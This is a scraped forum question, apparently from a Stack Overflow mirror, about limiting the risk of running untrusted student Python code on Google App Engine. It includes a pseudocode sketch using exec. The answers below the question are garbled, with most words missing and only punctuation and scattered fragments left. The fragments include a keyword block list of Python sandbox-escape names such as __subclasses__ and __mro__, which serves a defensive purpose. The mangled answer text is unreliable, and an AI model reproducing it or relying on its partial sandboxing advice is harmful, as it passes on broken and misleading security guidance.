In Python in GAE, what is the best way to limit the risk of running untrusted code?

I would like to give students the ability to submit python-based solutions to a few simple python issues. My application will work in GAE. How can I limit the risk associated with malicios code? I understand this is a complex issue, and I read related Stackoverflow and other posts on this subject. I wonder if the restrictions in place in the GAE environment make it easier to limit the damage that untrusted code can cause. Is it possible to simply view the submitted code for a few restricted keywords (exec, import, etc.), and then make sure that the code only works for a certain period of time, or is it still difficult to protect untrusted code in the sandbox even in a limited GAE environment ? For example:

# Import and execute untrusted code in GAE
untrustedCode = """#Untrusted code from students."""

class TestSpace(object):pass
  testspace = TestSpace()

try:
  #Check the untrusted code somehow and throw and exception.
except:
   print "Code attempted to import or access network"


try:
    # exec code in a new namespace (Thanks Alex Martelli)
    # limit runtime somehow
    exec untrustedCode in vars(testspace)
except:
    print "Code took more than x seconds to run"
+3
3

@mjv smiley : , ( ) , .

, , ( ;-), " ", , , __import__ & c. , exec, eval, import, __subclasses__, __bases__, __mro__,..., . GAE, , , , .

, : GAE , , ; , "", urlfetch ANOTHER, - . - , ...

+5

Python App Engine . Alex , , , , . , , , .

, Python, . . Guido Python, . .

: , Rhino ( Javascript) Java; Rhino . Jython; , , .

Alex . , shell.appspot.com : , , , .

+2
0

Source: https://habr.com/ru/post/1718867/


All Articles